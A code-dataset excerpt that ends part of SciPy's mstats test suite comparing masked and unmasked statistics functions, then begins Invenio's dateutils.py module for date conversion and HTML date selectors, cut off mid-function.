attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
class TestKruskal():
def test_result_attributes(self):
x = [1, 3, 5, 7, 9]
y = [2, 4, 6, 8, 10]
res = mstats.kruskal(x, y)
attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
#TODO: for all ttest functions, add tests with masked array inputs
class TestTtest_rel():
def test_vs_nonmasked(self):
np.random.seed(1234567)
outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
# 1-D inputs
res1 = stats.ttest_rel(outcome[:, 0], outcome[:, 1])
res2 = mstats.ttest_rel(outcome[:, 0], outcome[:, 1])
assert_allclose(res1, res2)
# 2-D inputs
res1 = stats.ttest_rel(outcome[:, 0], outcome[:, 1], axis=None)
res2 = mstats.ttest_rel(outcome[:, 0], outcome[:, 1], axis=None)
assert_allclose(res1, res2)
res1 = stats.ttest_rel(outcome[:, :2], outcome[:, 2:], axis=0)
res2 = mstats.ttest_rel(outcome[:, :2], outcome[:, 2:], axis=0)
assert_allclose(res1, res2)
# Check default is axis=0
res3 = mstats.ttest_rel(outcome[:, :2], outcome[:, 2:])
assert_allclose(res2, res3)
def test_fully_masked(self):
np.random.seed(1234567)
outcome = ma.masked_array(np.random.randn(3, 2),
mask=[[1, 1, 1], [0, 0, 0]])
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
assert_array_equal(mstats.ttest_rel(outcome[:, 0], outcome[:, 1]),
(np.nan, np.nan))
assert_array_equal(mstats.ttest_rel([np.nan, np.nan], [1.0, 2.0]),
(np.nan, np.nan))
def test_result_attributes(self):
np.random.seed(1234567)
outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
res = mstats.ttest_rel(outcome[:, 0], outcome[:, 1])
attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
def test_invalid_input_size(self):
assert_raises(ValueError, mstats.ttest_rel,
np.arange(10), np.arange(11))
x = np.arange(24)
assert_raises(ValueError, mstats.ttest_rel,
x.reshape(2, 3, 4), x.reshape(2, 4, 3), axis=1)
assert_raises(ValueError, mstats.ttest_rel,
x.reshape(2, 3, 4), x.reshape(2, 4, 3), axis=2)
def test_empty(self):
res1 = mstats.ttest_rel([], [])
assert_(np.all(np.isnan(res1)))
def test_zero_division(self):
t, p = mstats.ttest_ind([0, 0, 0], [1, 1, 1])
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
assert_equal((np.abs(t), p), (np.inf, 0))
assert_array_equal(mstats.ttest_ind([0, 0, 0], [0, 0, 0]),
(np.nan, np.nan))
class TestTtest_ind():
def test_vs_nonmasked(self):
np.random.seed(1234567)
outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
# 1-D inputs
res1 = stats.ttest_ind(outcome[:, 0], outcome[:, 1])
res2 = mstats.ttest_ind(outcome[:, 0], outcome[:, 1])
assert_allclose(res1, res2)
# 2-D inputs
res1 = stats.ttest_ind(outcome[:, 0], outcome[:, 1], axis=None)
res2 = mstats.ttest_ind(outcome[:, 0], outcome[:, 1], axis=None)
assert_allclose(res1, res2)
res1 = stats.ttest_ind(outcome[:, :2], outcome[:, 2:], axis=0)
res2 = mstats.ttest_ind(outcome[:, :2], outcome[:, 2:], axis=0)
assert_allclose(res1, res2)
# Check default is axis=0
res3 = mstats.ttest_ind(outcome[:, :2], outcome[:, 2:])
assert_allclose(res2, res3)
# Check equal_var
res4 = stats.ttest_ind(outcome[:, 0], outcome[:, 1], equal_var=True)
res5 = mstats.ttest_ind(outcome[:, 0], outcome[:, 1], equal_var=True)
assert_allclose(res4, res5)
res4 = stats.ttest_ind(outcome[:, 0], outcome[:, 1], equal_var=False)
res5 = mstats.ttest_ind(outcome[:, 0], outcome[:, 1], equal_var=False)
assert_allclose(res4, res5)
def test_fully_masked(self):
np.random.seed(1234567)
outcome = ma.masked_array(np.random.randn(3, 2), mask=[[1, 1, 1], [0, 0, 0]])
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
assert_array_equal(mstats.ttest_ind(outcome[:, 0], outcome[:, 1]),
(np.nan, np.nan))
assert_array_equal(mstats.ttest_ind([np.nan, np.nan], [1.0, 2.0]),
(np.nan, np.nan))
def test_result_attributes(self):
np.random.seed(1234567)
outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
res = mstats.ttest_ind(outcome[:, 0], outcome[:, 1])
attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
def test_empty(self):
res1 = mstats.ttest_ind([], [])
assert_(np.all(np.isnan(res1)))
def test_zero_division(self):
t, p = mstats.ttest_ind([0, 0, 0], [1, 1, 1])
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
assert_equal((np.abs(t), p), (np.inf, 0))
assert_array_equal(mstats.ttest_ind([0, 0, 0], [0, 0, 0]),
(np.nan, np.nan))
t, p = mstats.ttest_ind([0, 0, 0], [1, 1, 1], equal_var=False)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
assert_equal((np.abs(t), p), (np.inf, 0))
assert_array_equal(mstats.ttest_ind([0, 0, 0], [0, 0, 0],
equal_var=False),
(np.nan, np.nan))
class TestTtest_1samp():
def test_vs_nonmasked(self):
np.random.seed(1234567)
outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
# 1-D inputs
res1 = stats.ttest_1samp(outcome[:, 0], 1)
res2 = mstats.ttest_1samp(outcome[:, 0], 1)
assert_allclose(res1, res2)
# 2-D inputs
res1 = stats.ttest_1samp(outcome[:, 0], outcome[:, 1], axis=None)
res2 = mstats.ttest_1samp(outcome[:, 0], outcome[:, 1], axis=None)
assert_allclose(res1, res2)
res1 = stats.ttest_1samp(outcome[:, :2], outcome[:, 2:], axis=0)
res2 = mstats.ttest_1samp(outcome[:, :2], outcome[:, 2:], axis=0)
assert_allclose(res1, res2)
# Check default is axis=0
res3 = mstats.ttest_1samp(outcome[:, :2], outcome[:, 2:])
assert_allclose(res2, res3)
def test_fully_masked(self):
np.random.seed(1234567)
outcome = ma.masked_array(np.random.randn(3), mask=[1, 1, 1])
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
assert_array_equal(mstats.ttest_1samp(outcome, 0.0),
(np.nan, np.nan))
assert_array_equal(mstats.ttest_1samp((np.nan, np.nan), 0.0),
(np.nan, np.nan))
def test_result_attributes(self):
np.random.seed(1234567)
outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
res = mstats.ttest_1samp(outcome[:, 0], 1)
attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
def test_empty(self):
res1 = mstats.ttest_1samp([], 1)
assert_(np.all(np.isnan(res1)))
def test_zero_division(self):
t, p = mstats.ttest_1samp([0, 0, 0], 1)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
assert_equal((np.abs(t), p), (np.inf, 0))
assert_array_equal(mstats.ttest_1samp([0, 0, 0], 0),
(np.nan, np.nan))
class TestCompareWithStats(TestCase):
"""
Class to compare mstats results with stats results.
It is in general assumed that scipy.stats is at a more mature stage than
stats.mstats. If a routine in mstats results in similar results like in
scipy.stats, this is considered also as a proper validation of scipy.mstats
routine.
Different sample sizes are used for testing, as some problems between stats
and mstats are dependent on sample size.
Author: Alexander Loew
NOTE that some tests fail. This might be caused by
a) actual differences or bugs between stats and mstats
b) numerical inaccuracies
c) different definitions of routine interfaces
These failures need to be checked. Current workaround is to have disabled these tests,
but issuing reports on scipy-dev
"""
def get_n(self):
""" Returns list of sample sizes to be used for comparison. """
return [1000, 100, 10, 5]
def generate_xy_sample(self, n):
# This routine generates numpy arrays and corresponding masked arrays
# with the same data, but additional masked values
np.random.seed(1234567)
x = np.random.randn(n)
y = x + np.random.randn(n)
xm = np.ones(len(x) + 5) * 1e16
ym = np.ones(len(y) + 5) * 1e16
xm[0:len(x)] = x
ym[0:len(y)] = y
mask = xm > 9e15
xm = np.ma.array(xm, mask=mask)
ym = np.ma.array(ym, mask=mask)
return x, y, xm, ym
def generate_xy_sample2D(self, n, nx):
x = np.ones((n, nx)) * np.nan
y = np.ones((n, nx)) * np.nan
xm = np.ones((n+5, nx)) * np.nan
ym = np.ones((n+5, nx)) * np.nan
for i in range(nx):
x[:,i], y[:,i], dx, dy = self.generate_xy_sample(n)
xm[0:n, :] = x[0:n]
ym[0:n, :] = y[0:n]
xm = np.ma.array(xm, mask=np.isnan(xm))
ym = np.ma.array(ym, mask=np.isnan(ym))
return x, y, xm, ym
def test_linregress(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
res1 = stats.linregress(x, y)
res2 = stats.mstats.linregress(xm, ym)
assert_allclose(np.asarray(res1), np.asarray(res2))
def test_pearsonr(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r, p = stats.pearsonr(x, y)
rm, pm = stats.mstats.pearsonr(xm, ym)
assert_almost_equal(r, rm, decimal=14)
assert_almost_equal(p, pm, decimal=14)
def test_spearmanr(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r, p = stats.spearmanr(x, y)
rm, pm = stats.mstats.spearmanr(xm, ym)
assert_almost_equal(r, rm, 14)
assert_almost_equal(p, pm, 14)
def test_gmean(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.gmean(abs(x))
rm = stats.mstats.gmean(abs(xm))
assert_allclose(r, rm, rtol=1e-13)
r = stats.gmean(abs(y))
rm = stats.mstats.gmean(abs(ym))
assert_allclose(r, rm, rtol=1e-13)
def test_hmean(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.hmean(abs(x))
rm = stats.mstats.hmean(abs(xm))
assert_almost_equal(r, rm, 10)
r = stats.hmean(abs(y))
rm = stats.mstats.hmean(abs(ym))
assert_almost_equal(r, rm, 10)
def test_skew(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.skew(x)
rm = stats.mstats.skew(xm)
assert_almost_equal(r, rm, 10)
r = stats.skew(y)
rm = stats.mstats.skew(ym)
assert_almost_equal(r, rm, 10)
def test_moment(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.moment(x)
rm = stats.mstats.moment(xm)
assert_almost_equal(r, rm, 10)
r = stats.moment(y)
rm = stats.mstats.moment(ym)
assert_almost_equal(r, rm, 10)
def test_signaltonoise(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.signaltonoise(x)
rm = stats.mstats.signaltonoise(xm)
assert_almost_equal(r, rm, 10)
r = stats.signaltonoise(y)
rm = stats.mstats.signaltonoise(ym)
assert_almost_equal(r, rm, 10)
def test_betai(self):
np.random.seed(12345)
for i in range(10):
a = np.random.rand() * 5.
b = np.random.rand() * 200.
with warnings.catch_warnings():
warnings.filterwarnings('ignore', category=DeprecationWarning)
assert_equal(stats.betai(a, b, 0.), 0.)
assert_equal(stats.betai(a, b, 1.), 1.)
assert_equal(stats.mstats.betai(a, b, 0.), 0.)
assert_equal(stats.mstats.betai(a, b, 1.), 1.)
x = np.random.rand()
assert_almost_equal(stats.betai(a, b, x),
stats.mstats.betai(a, b, x), decimal=13)
def test_zscore(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
#reference solution
zx = (x - x.mean()) / x.std()
zy = (y - y.mean()) / y.std()
#validate stats
assert_allclose(stats.zscore(x), zx, rtol=1e-10)
assert_allclose(stats.zscore(y), zy, rtol=1e-10)
#compare stats and mstats
assert_allclose(stats.zscore(x), stats.mstats.zscore(xm[0:len(x)]),
rtol=1e-10)
assert_allclose(stats.zscore(y), stats.mstats.zscore(ym[0:len(y)]),
rtol=1e-10)
def test_kurtosis(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.kurtosis(x)
rm = stats.mstats.kurtosis(xm)
assert_almost_equal(r, rm, 10)
r = stats.kurtosis(y)
rm = stats.mstats.kurtosis(ym)
assert_almost_equal(r, rm, 10)
def test_sem(self):
# example from stats.sem doc
a = np.arange(20).reshape(5,4)
am = np.ma.array(a)
r = stats.sem(a,ddof=1)
rm = stats.mstats.sem(am, ddof=1)
assert_allclose(r, 2.82842712, atol=1e-5)
assert_allclose(rm, 2.82842712, atol=1e-5)
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
assert_almost_equal(stats.mstats.sem(xm, axis=None, ddof=0),
stats.sem(x, axis=None, ddof=0), decimal=13)
assert_almost_equal(stats.mstats.sem(ym, axis=None, ddof=0),
stats.sem(y, axis=None, ddof=0), decimal=13)
assert_almost_equal(stats.mstats.sem(xm, axis=None, ddof=1),
stats.sem(x, axis=None, ddof=1), decimal=13)
assert_almost_equal(stats.mstats.sem(ym, axis=None, ddof=1),
stats.sem(y, axis=None, ddof=1), decimal=13)
def test_describe(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.describe(x, ddof=1)
rm = stats.mstats.describe(xm, ddof=1)
for ii in range(6):
assert_almost_equal(np.asarray(r[ii]),
np.asarray(rm[ii]),
decimal=12)
def test_describe_result_attributes(self):
actual = mstats.describe(np.arange(5))
attributes = ('nobs', 'minmax', 'mean', 'variance', 'skewness',
'kurtosis')
check_named_results(actual, attributes, ma=True)
def test_rankdata(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.rankdata(x)
rm = stats.mstats.rankdata(x)
assert_allclose(r, rm)
def test_tmean(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
assert_almost_equal(stats.tmean(x),stats.mstats.tmean(xm), 14)
assert_almost_equal(stats.tmean(y),stats.mstats.tmean(ym), 14)
def test_tmax(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
assert_almost_equal(stats.tmax(x,2.),
stats.mstats.tmax(xm,2.), 10)
assert_almost_equal(stats.tmax(y,2.),
stats.mstats.tmax(ym,2.), 10)
assert_almost_equal(stats.tmax(x, upperlimit=3.),
stats.mstats.tmax(xm, upperlimit=3.), 10)
assert_almost_equal(stats.tmax(y, upperlimit=3.),
stats.mstats.tmax(ym, upperlimit=3.), 10)
def test_tmin(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
assert_equal(stats.tmin(x),stats.mstats.tmin(xm))
assert_equal(stats.tmin(y),stats.mstats.tmin(ym))
assert_almost_equal(stats.tmin(x,lowerlimit=-1.),
stats.mstats.tmin(xm,lowerlimit=-1.), 10)
assert_almost_equal(stats.tmin(y,lowerlimit=-1.),
stats.mstats.tmin(ym,lowerlimit=-1.), 10)
def test_zmap(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
z = stats.zmap(x,y)
zm = stats.mstats.zmap(xm,ym)
assert_allclose(z, zm[0:len(z)], atol=1e-10)
def test_variation(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
assert_almost_equal(stats.variation(x), stats.mstats.variation(xm),
decimal=12)
assert_almost_equal(stats.variation(y), stats.mstats.variation(ym),
decimal=12)
def test_tvar(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
assert_almost_equal(stats.tvar(x), stats.mstats.tvar(xm),
decimal=12)
assert_almost_equal(stats.tvar(y), stats.mstats.tvar(ym),
decimal=12)
def test_trimboth(self):
a = np.arange(20)
b = stats.trimboth(a, 0.1)
bm = stats.mstats.trimboth(a, 0.1)
assert_allclose(np.sort(b), bm.data[~bm.mask])
def test_tsem(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
assert_almost_equal(stats.tsem(x),stats.mstats.tsem(xm), decimal=14)
assert_almost_equal(stats.tsem(y),stats.mstats.tsem(ym), decimal=14)
assert_almost_equal(stats.tsem(x,limits=(-2.,2.)),
stats.mstats.tsem(xm,limits=(-2.,2.)),
decimal=14)
def test_skewtest(self):
# this test is for 1D data
for n in self.get_n():
if n > 8:
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.skewtest(x)
rm = stats.mstats.skewtest(xm)
assert_allclose(r[0], rm[0], rtol=1e-15)
# TODO this test is not performed as it is a known issue that
# mstats returns a slightly different p-value what is a bit
# strange is that other tests like test_maskedarray_input don't
# fail!
#~ assert_almost_equal(r[1], rm[1])
def test_skewtest_result_attributes(self):
x = np.array((-2, -1, 0, 1, 2, 3)*4)**2
res = mstats.skewtest(x)
attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
def test_skewtest_2D_notmasked(self):
# a normal ndarray is passed to the masked function
x = np.random.random((20, 2)) * 20.
r = stats.skewtest(x)
rm = stats.mstats.skewtest(x)
assert_allclose(np.asarray(r), np.asarray(rm))
def test_skewtest_2D_WithMask(self):
nx = 2
for n in self.get_n():
if n > 8:
x, y, xm, ym = self.generate_xy_sample2D(n, nx)
r = stats.skewtest(x)
rm = stats.mstats.skewtest(xm)
assert_equal(r[0][0],rm[0][0])
assert_equal(r[0][1],rm[0][1])
def test_normaltest(self):
np.seterr(over='raise')
for n in self.get_n():
if n > 8:
with warnings.catch_warnings():
warnings.filterwarnings('ignore', category=UserWarning)
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.normaltest(x)
rm = stats.mstats.normaltest(xm)
assert_allclose(np.asarray(r), np.asarray(rm))
def test_find_repeats(self):
x = np.asarray([1,1,2,2,3,3,3,4,4,4,4]).astype('float')
tmp = np.asarray([1,1,2,2,3,3,3,4,4,4,4,5,5,5,5]).astype('float')
mask = (tmp == 5.)
xm = np.ma.array(tmp, mask=mask)
x_orig, xm_orig = x.copy(), xm.copy()
r = stats.find_repeats(x)
rm = stats.mstats.find_repeats(xm)
assert_equal(r, rm)
assert_equal(x, x_orig)
assert_equal(xm, xm_orig)
# This crazy behavior is expected by count_tied_groups, but is not
# in the docstring...
_, counts = stats.mstats.find_repeats([])
assert_equal(counts, np.array(0, dtype=np.intp))
def test_kendalltau(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.kendalltau(x, y)
rm = stats.mstats.kendalltau(xm, ym)
assert_almost_equal(r[0], rm[0], decimal=10)
assert_almost_equal(r[1], rm[1], decimal=7)
def test_obrientransform(self):
for n in self.get_n():
x, y, xm, ym = self.generate_xy_sample(n)
r = stats.obrientransform(x)
rm = stats.mstats.obrientransform(xm)
assert_almost_equal(r.T, rm[0:len(x)])
if __name__ == "__main__":
run_module_suite()
| agpl-3.0 |
Dziolas/invenio | modules/miscutil/lib/dateutils.py | 11 | 18834 | # -*- coding: utf-8 -*-
##
## Some functions about dates
##
## This file is part of Invenio.
## Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
API for date conversion and date related GUI creation.
Lexicon
datetext:
textual format => 'YEAR-MONTH-DAY HOUR:MINUTE:SECOND'
e.g. '2005-11-16 15:11:44'
default value: '0000-00-00 00:00:00'
datestruct:
tuple format => see http://docs.python.org/lib/module-time.html
(YEAR, MONTH, DAY, HOUR, MINUTE, SECOND, WEEKDAY, YEARDAY, DAYLIGHT)
e.g. (2005, 11, 16, 15, 11, 44, 2, 320, 0)
default value: (0, 0, 0, 0, 0, 0, 0, 0, 0)
dategui:
textual format for output => 'DAY MONTH YEAR, HOUR:MINUTE'
e.g. '16 nov 2005, 15:11'
default value: _("N/A")
"""
__revision__ = "$Id$"
import re
import time
from datetime import date as real_date, \
datetime as real_datetime, \
time as real_time, \
timedelta
from invenio.config import CFG_SITE_LANG
from invenio.messages import gettext_set_language
try:
from mx.DateTime import Parser
CFG_HAS_EGENIX_DATETIME = True
except ImportError:
CFG_HAS_EGENIX_DATETIME = False
datetext_default = '0000-00-00 00:00:00'
datestruct_default = (0, 0, 0, 0, 0, 0, 0, 0, 0)
datetext_format = "%Y-%m-%d %H:%M:%S"
class date(real_date):
def strftime(self, fmt):
return strftime(fmt, self)
class datetime(real_datetime):
def strftime(self, fmt):
return strftime(fmt, self)
def __add__(self, other):
d = real_datetime.combine(self, self.timetz())
d += other
return self.combine(d, d.timetz())
def date(self):
return date(self.year, self.month, self.day)
@staticmethod
def strptime(date_string, format):
return datetime(*(time.strptime(date_string, format)[0:6]))
def convert_datetext_to_dategui(datetext, ln=CFG_SITE_LANG, secs=False):
"""
Convert:
'2005-11-16 15:11:57' => '16 nov 2005, 15:11'
Or optionally with seconds:
'2005-11-16 15:11:57' => '16 nov 2005, 15:11:57'
Month is internationalized
"""
try:
datestruct = convert_datetext_to_datestruct(datetext)
if datestruct == datestruct_default:
raise ValueError
month = get_i18n_month_name(datestruct[1], ln=ln)
if secs:
output_format = "%d " + month + " %Y, %H:%M:%S"
else:
output_format = "%d " + month + " %Y, %H:%M"
return strftime(output_format, datestruct)
except:
_ = gettext_set_language(ln)
return _("N/A")
def convert_datetext_to_datestruct(datetext):
"""
Convert:
'2005-11-16 15:11:57' => (2005, 11, 16, 15, 11, 44, 2, 320, 0)
"""
try:
return time.strptime(datetext, datetext_format)
except:
return datestruct_default
def convert_datestruct_to_dategui(datestruct, ln=CFG_SITE_LANG):
"""
Convert:
(2005, 11, 16, 15, 11, 44, 2, 320, 0) => '16 nov 2005, 15:11'
Month is internationalized
"""
try:
if datestruct[0] and datestruct[1] and datestruct[2]:
month = get_i18n_month_name(datestruct[1], ln=ln)
output_format = "%d " + month + " %Y, %H:%M"
return strftime(output_format, datestruct)
else:
raise ValueError
except:
_ = gettext_set_language(ln)
return _("N/A")
def convert_datestruct_to_datetext(datestruct):
"""
Convert:
(2005, 11, 16, 15, 11, 44, 2, 320, 0) => '2005-11-16 15:11:57'
"""
try:
return strftime(datetext_format, datestruct)
except:
return datetext_default
def convert_datecvs_to_datestruct(datecvs):
"""
Convert CVS $Date$ and
$Id$
formats into datestruct. Useful for later conversion of Last
updated timestamps in the page footers.
Example: '$Date$' => (2006, 09, 20, 19, 27, 11, 0, 0)
"""
try:
if datecvs.startswith("$Id"):
date_time = ' '.join(datecvs.split(" ")[3:5])
return time.strptime(date_time, '%Y/%m/%d %H:%M:%S')
else:
# here we have to use '$' + 'Date...' here, otherwise the CVS
# commit would erase this time format to put commit date:
return time.strptime(datecvs, '$' + 'Date: %Y/%m/%d %H:%M:%S $')
except ValueError:
return datestruct_default
def get_datetext(year, month, day):
"""
year=2005, month=11, day=16 => '2005-11-16 00:00:00'
"""
input_format = "%Y-%m-%d"
try:
datestruct = time.strptime("%i-%i-%i"% (year, month, day), input_format)
return strftime(datetext_format, datestruct)
except:
return datetext_default
def get_datestruct(year, month, day):
"""
year=2005, month=11, day=16 => (2005, 11, 16, 0, 0, 0, 2, 320, -1)
"""
input_format = "%Y-%m-%d"
try:
return time.strptime("%i-%i-%i"% (year, month, day), input_format)
except ValueError or TypeError:
return datestruct_default
def get_i18n_day_name(day_nb, display='short', ln=CFG_SITE_LANG):
"""
get the string representation of a weekday, internationalized
@param day_nb: number of weekday UNIX like.
=> 0=Sunday
@param ln: language for output
@return: the string representation of the day
"""
_ = gettext_set_language(ln)
if display == 'short':
days = {0: _("Sun"),
1: _("Mon"),
2: _("Tue"),
3: _("Wed"),
4: _("Thu"),
5: _("Fri"),
6: _("Sat")}
else:
days = {0: _("Sunday"),
1: _("Monday"),
2: _("Tuesday"),
3: _("Wednesday"),
4: _("Thursday"),
5: _("Friday"),
6: _("Saturday")}
return days[day_nb]
def get_i18n_month_name(month_nb, display='short', ln=CFG_SITE_LANG):
"""
get a non-numeric representation of a month, internationalized.
@param month_nb: number of month, (1 based!)
=>1=jan,..,12=dec
@param ln: language for output
@return: the string representation of month
"""
_ = gettext_set_language(ln)
if display == 'short':
months = {0: _("Month"),
1: _("Jan"),
2: _("Feb"),
3: _("Mar"),
4: _("Apr"),
5: _("May"),
6: _("Jun"),
7: _("Jul"),
8: _("Aug"),
9: _("Sep"),
10: _("Oct"),
11: _("Nov"),
12: _("Dec")}
else:
months = {0: _("Month"),
1: _("January"),
2: _("February"),
3: _("March"),
4: _("April"),
5: _("May "), # trailing space distinguishes short/long form
6: _("June"),
7: _("July"),
8: _("August"),
9: _("September"),
10: _("October"),
11: _("November"),
12: _("December")}
return months[month_nb].strip()
def create_day_selectbox(name, selected_day=0, ln=CFG_SITE_LANG):
"""
Creates an HTML menu for day selection. (0..31 values).
@param name: name of the control (i.e. name of the var you'll get)
@param selected_day: preselect a day. Use 0 for the label 'Day'
@param ln: language of the menu
@return: html a string
"""
_ = gettext_set_language(ln)
out = "<select name=\"%s\">\n"% name
for i in range(0, 32):
out += " <option value=\"%i\""% i
if (i == selected_day):
out += " selected=\"selected\""
if (i == 0):
out += ">%s</option>\n"% _("Day")
else:
out += ">%i</option>\n"% i
out += "</select>\n"
return out
def create_month_selectbox(name, selected_month=0, ln=CFG_SITE_LANG):
"""
Creates an HTML menu for month selection. Value of selected field is numeric
@param name: name of the control (your form will be sent with name=value...)
@param selected_month: preselect a month. use 0 for the Label 'Month'
@param ln: language of the menu
@return: html as string
"""
out = "<select name=\"%s\">\n"% name
for i in range(0, 13):
out += "<option value=\"%i\""% i
if (i == selected_month):
out += " selected=\"selected\""
out += ">%s</option>\n"% get_i18n_month_name(i, ln)
out += "</select>\n"
return out
def create_year_inputbox(name, value=0):
"""
Creates an HTML field (simple input) for year selection.
@param name: name of the control (i.e. name of the variable you'll get)
@param value: prefilled value (int)
@return: html as string
"""
out = "<input type=\"text\" name=\"%s\" value=\"%i\" maxlength=\"4\" size=\"4\"/>\n"% (name, value)
return out
def create_year_selectbox(name, from_year=-1, length=10, selected_year=0, ln=CFG_SITE_LANG):
"""
Creates an HTML menu (dropdownbox) for year selection.
@param name: name of control( i.e. name of the variable you'll get)
@param from_year: year on which to begin. if <0 assume it is current year
@param length: number of items in menu
@param selected_year: initial selected year (if in range), else: label is selected
@param ln: language
@return: html as string
"""
_ = gettext_set_language(ln)
if from_year < 0:
from_year = time.localtime()[0]
out = "<select name=\"%s\">\n"% name
out += ' <option value="0"'
if selected_year == 0:
out += ' selected="selected"'
out += ">%s</option>\n"% _("Year")
for i in range(from_year, from_year + length):
out += "<option value=\"%i\""% i
if (i == selected_year):
out += " selected=\"selected\""
out += ">%i</option>\n"% i
out += "</select>\n"
return out
_RE_RUNTIMELIMIT_FULL = re.compile(r"(?:(?P<weekday_begin>[a-z]+)(?:-(?P<weekday_end>[a-z]+))?)?\s*((?P<hour_begin>\d\d?(:\d\d?)?)(-(?P<hour_end>\d\d?(:\d\d?)?))?)?", re.I)
_RE_RUNTIMELIMIT_HOUR = re.compile(r'(?P<hours>\d\d?)(:(?P<minutes>\d\d?))?')
def parse_runtime_limit(value, now=None):
"""
Parsing CLI option for runtime limit, supplied as VALUE.
Value could be something like: Sunday 23:00-05:00, the format being
[Wee[kday]] [hh[:mm][-hh[:mm]]].
The function will return two valid time ranges. The first could be in the past, containing the present or in the future. The second is always in the future.
"""
def extract_time(value):
value = _RE_RUNTIMELIMIT_HOUR.search(value).groupdict()
return timedelta(hours=int(value['hours']),
minutes=int(value['minutes']))
def extract_weekday(value):
key = value[:3].lower()
try:
return {
'mon' : 0,
'tue' : 1,
'wed' : 2,
'thu' : 3,
'fri' : 4,
'sat' : 5,
'sun' : 6,
}[key]
except KeyError:
raise ValueError("%s is not a good weekday name." % value)
if now is None:
now = datetime.now()
today = now.date()
g = _RE_RUNTIMELIMIT_FULL.search(value)
if not g:
raise ValueError('"%s" does not seem to be correct format for parse_runtime_limit() [Wee[kday]] [hh[:mm][-hh[:mm]]]).' % value)
pieces = g.groupdict()
if pieces['weekday_begin'] is None:
# No weekday specified. So either today or tomorrow
first_occasion_day = timedelta(days=0)
next_occasion_delta = timedelta(days=1)
else:
# If given 'Mon' then we transform it to 'Mon-Mon'
if pieces['weekday_end'] is None:
pieces['weekday_end'] = pieces['weekday_begin']
# Day range
weekday_begin = extract_weekday(pieces['weekday_begin'])
weekday_end = extract_weekday(pieces['weekday_end'])
if weekday_begin <= today.weekday() <= weekday_end:
first_occasion_day = timedelta(days=0)
else:
days = (weekday_begin - today.weekday()) % 7
first_occasion_day = timedelta(days=days)
weekday = (now + first_occasion_day).weekday()
if weekday < weekday_end:
# Fits in the same week
next_occasion_delta = timedelta(days=1)
else:
# The week after
days = weekday_begin - weekday + 7
next_occasion_delta = timedelta(days=days)
if pieces['hour_begin'] is None:
pieces['hour_begin'] = '00:00'
if pieces['hour_end'] is None:
pieces['hour_end'] = '00:00'
beginning_time = extract_time(pieces['hour_begin'])
ending_time = extract_time(pieces['hour_end'])
if not ending_time:
ending_time = beginning_time + timedelta(days=1)
elif beginning_time and ending_time and beginning_time > ending_time:
ending_time += timedelta(days=1)
start_time = real_datetime.combine(today, real_time(hour=0, minute=0))
current_range = (
start_time + first_occasion_day + beginning_time,
start_time + first_occasion_day + ending_time
)
if now > current_range[1]:
current_range = tuple(t + next_occasion_delta for t in current_range)
future_range = (
current_range[0] + next_occasion_delta,
current_range[1] + next_occasion_delta
)
return current_range, future_range
def guess_datetime(datetime_string):
"""
Try to guess the datetime contained in a string of unknow format.
@param datetime_string: the datetime representation.
@type datetime_string: string
@return: the guessed time.
@rtype: L{time.struct_time}
@raises ValueError: in case it's not possible to guess the time.
"""
if CFG_HAS_EGENIX_DATETIME:
try:
return Parser.DateTimeFromString(datetime_string).timetuple()
except ValueError:
pass
else:
